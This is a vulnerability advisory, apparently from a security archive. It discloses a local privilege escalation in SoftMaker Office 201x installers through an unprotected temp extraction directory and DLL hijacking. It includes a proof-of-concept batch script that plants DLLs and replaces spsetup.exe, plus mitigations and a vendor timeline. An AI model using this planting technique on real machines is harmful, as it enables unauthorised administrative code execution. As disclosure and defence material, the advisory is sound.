what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

SoftMaker Office 201x Privilege Escalation

SoftMaker Office 201x Privilege Escalation
Posted Jan 4, 2017
Authored by Stefan Kanthak

SoftMaker Office 201x suffers from a local privilege escalation vulnerability due to an unprotected directory.

tags | exploit, local
SHA-256 | b98074bf19e66e0f81e92f16fb516806bfdbf2c540066e3392ed006fb5a1d993

SoftMaker Office 201x Privilege Escalation

Change Mirror Download
Hi @ll,

the service pack installers for SoftMaker Office 201x, available
from <http://www.softmaker.com/en/servicepacks-office-windows>,
are (surprise.-) vulnerable.


The executable installer (OUCH) ofw16_763.exe, a 7z SFX (OUCH),
creates an UNPROTECTED directory "%TEMP%\7zSxxxxxxxx\" to extract
its payload, then executes "%TEMP%\7zSxxxxxxxx\spsetup.exe".

"%TEMP%\7zSxxxxxxxx\" inherits the NTFS access rights of its parent
"%TEMP%\", i.e. allows full access for the UNPRIVILEGED user.

For this well-known vulnerability see
<https://cwe.mitre.org/data/definitions/377.html> and
<https://cwe.mitre.org/data/definitions/379.html>


Due to the embedded application manifest which specifies
"requireAdministrator" the executable installer can only be run
with administrative rights.

JFTR: if written properly, it would create a PROTECTED directory
"%TEMP%\7zSxxxxxxxx\", writable only for privileged users!

The UNPRIVILEGED user as well as any program running with the
users credentials can modify the extracted files, for example
"%TEMP%\7zSxxxxxxxx\spsetup.exe", which is executed with
administrative rights, resulting in arbitrary code execution
with elevation of privilege.

Additionally "spsetup.exe" is vulnerable to DLL hijacking,
another well-known vulnerability.
See <https://capec.mitre.org/data/definitions/471.html>,
<https://cwe.mitre.org/data/definitions/426.html>,
<https://cwe.mitre.org/data/definitions/427.html>
<https://technet.microsoft.com/en-us/library/2269637.aspx>,
<https://msdn.microsoft.com/en-us/library/ff919712.aspx> and
<https://msdn.microsoft.com/en-us/library/ms682586.aspx> plus
<http://blogs.technet.com/b/srd/archive/2014/05/13/load-library-safely.aspx>

Thanks to the unprotected directory "%TEMP%\7zSxxxxxxxx\" the
unprivileged user can write DLLs to "%TEMP%\7zSxxxxxxxx\" which
are loaded by "spsetup.exe", again resulting in arbitrary code
execution with elevation of privilege!


Proof-of-concept:
~~~~~~~~~~~~~~~~~

0. download <http://www.softmaker.net/down/ofw16_763.exe> and
save it in an arbitrary directory;

1. download <http://home.arcor.de/skanthak/download/SENTINEL.DLL>
(see <http://home.arcor.de/skanthak/sentinel.html> alias
<https://skanthak.homepage.t-online.de/sentinel.html>) and
save it in an(other) arbitrary directory;

2. save the following batch script in same the directory as
SENTINEL.DLL:

--- OFW16_873.CMD ---
:WAIT
@If Not Exist "%TEMP%\7z*" Goto :WAIT
For /D %%! In ("%TEMP%\7z*") Do Set foobar=%%!
Copy "SENTINEL.DLL" "%foobar%\NTMARTA.DLL"
Copy "SENTINEL.DLL" "%foobar%\VERSION.DLL"
Copy "SENTINEL.DLL" "%foobar%\WINSPOOL.DRV"
--- EOF ---

3. start the batch script;

4. execute ofw16_873.exe and notice the message boxes displayed
by SENTINEL.DLL.

PWNED!

5. download <http://home.arcor.de/skanthak/download/SENTINEL.EXE>
to the same directory as the batch script;

6. in the batch script replace the 3 lines Copy ... with
Copy "SENTINEL.EXE" "%foobar%\spsetup.exe"

7. start the batch script;

8. execute ofw16_873.exe and notice the message box displayed
by SENTINEL.EXE.

PWNED!


Mitigations:
~~~~~~~~~~~~

* Don't use executable installers! NEVER!
Don't use self-extractors! NEVER!

See <http://seclists.org/fulldisclosure/2015/Nov/101> and
<http://seclists.org/fulldisclosure/2015/Dec/86> plus
<http://home.arcor.de/skanthak/!execute.html> alias
<https://skanthak.homepage.t-online.de/!execute.html> for more
information.

* Practice STRICT privilege separation: NEVER use the so-called
"protected" administrator account(s) created during Windows
setup which use the same "%TEMP%" for unprivileged and privileged
processes!

* Add an ACE "(D;OIIO;WP;;;WD)" to the ACL of every "%USERPROFILE%";
use <https://msdn.microsoft.com/en-us/library/aa374928.aspx> to
decode it to "deny execution of files in this directory for
everyone, inheritable to all files in all subdirectories".


stay tuned
Stefan Kanthak


Timeline:
~~~~~~~~~

2016-12-15 sent vulnerability report to vendor

no reply, not even an acknowledegement of receipt

2016-12-23 resent vulnerability report to vendor, cc CERT at
german BSI

no reply, not even an acknowledegement of receipt

2016-12-27 CERT at german BSI contacts vendor offering help

no reply, not even an acknowledegement of receipt

2016-12-31 report published


Login or Register to add favorites

File Archive:

October 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    39 Files
  • 2
    Oct 2nd
    23 Files
  • 3
    Oct 3rd
    18 Files
  • 4
    Oct 4th
    20 Files
  • 5
    Oct 5th
    0 Files
  • 6
    Oct 6th
    0 Files
  • 7
    Oct 7th
    0 Files
  • 8
    Oct 8th
    0 Files
  • 9
    Oct 9th
    0 Files
  • 10
    Oct 10th
    0 Files
  • 11
    Oct 11th
    0 Files
  • 12
    Oct 12th
    0 Files
  • 13
    Oct 13th
    0 Files
  • 14
    Oct 14th
    0 Files
  • 15
    Oct 15th
    0 Files
  • 16
    Oct 16th
    0 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close